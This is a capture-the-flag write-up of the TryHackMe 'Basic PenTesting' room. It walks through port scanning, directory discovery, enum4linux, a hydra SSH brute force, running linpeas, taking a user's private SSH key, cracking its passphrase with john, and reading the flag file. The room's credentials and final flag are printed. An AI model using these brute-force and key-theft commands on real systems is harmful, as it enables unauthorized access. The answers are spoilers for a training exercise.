Basic PenTesting TryHackMe

performed by: jb-williams

Summary

  • Hidden directory on webserver(development, found via dirbuster&rockyou).

  • Username (jan and kay found via enum4linux).

  • Password(jan:armando found via hydra with ssh).

  • Private SSH Key found with Linpeas.

  • Cracked SSH Key

  • Was able to login and read pass.bak

User Pass Service SSH Key IP Port
jan armando ssh ———- 10.10.62.206 22
kay beeswax ssh kay_id_rsa 10.10.62.206 22
Ports Services
22 SSH 7.2
80 Apache 2.4.18
139 SMB 3.X -4.X
445 SMB 4.3.11
8009 Apache Jserv 1.3
8080 Apache tomcat 9.0.7

Scanning & Enumeration

  • Scanned Machine on the network:

IP:

10.10.62.206
  • Discovered these ports and services running on the device.

Ports:

22 - ssh 7.2
80 - apache 2.4.18
139 - SMB 3.X - 4.X
445 - SMB 4.3.11
8009- Apache Jserv 1.3
8080 Apache tomcat 9.0.7
  • Began enumeration on the webpage on port 80 with Dirbuster:

  • Discovered:

/development/*

/development/dev.txt

/development/j.txt
  • /development/dev.txt talks about Apache Struts 2.5.12, as well as initials of what I assume are employees:

    • Found initials: -K and -J
  • In /development/j.txt, found a message that was from K is telling J that they have a weak password that can be cracked easily.

Brute Forcing

  • Ran enum4linux on the target IP, splitting the output to STDOUT and a file:
enum4linux -a 10.10.62.206 | tee -a enum4linux.log
  • Enum4linux found the full usernames Kay and Jan:

  • Bruteforced ssh to find Jan's password:

hydra -l jan -P /usr/share/wordlist/rockyou.txt ssh://10.10.62.206
  • Credentials that were Found:
User Pass Service IP Port
jan armando ssh 10.10.62.206 22
  • Verified login credentials.

Internal Enumeration

  • Logged into jan’s account through ssh.

  • I was able to move traverse over to /home/kay, and say there was a pass.bak file

  • However, I was unable to read anything in /home/kay.

  • From my host, I used ssh to transfer Linpeas to the Machine into the shared memory:

scp /opt/linpeas/linpeas.sh jan@10.10.62:/dev/shm

ssh jan@10.10.62.206

chmod +x linpeas.sh && ./linpeas.sh | tee linlog.txt
  • This enumeration brought me to Kay’s Private SSH key that I was able to read.
/home/kay/.ssh/id_rsa
  • I copied to my host and changed the permissions on it.
chmod 600 kay_id_rsa
  • Discovered the SSH Key was password protected, so I sent it to ssh2john, out put it into a text doc to then run john on it.
python3 /usr/share/john/ssh2john.py kay_id_rsa > forjohn.txt

john forjohn.txt
  • John found kay's password: beeswax

  • SSH’d into the machine as Kay:

ssh -i kay_id_rsa kay@10.10.62.206
beeswax
User Pass Service SSH Key IP Port
kay beeswax ssh kay_id_rsa 10.10.62.206 22
  • As Kay I was able to read that pass.bak file:
cat pass.bak
  • With that I was able to find the Password/Last Flag:
heresareallystrongpasswordthatfollowsthepasswordpolicy$$

written and performed by jb-williams - github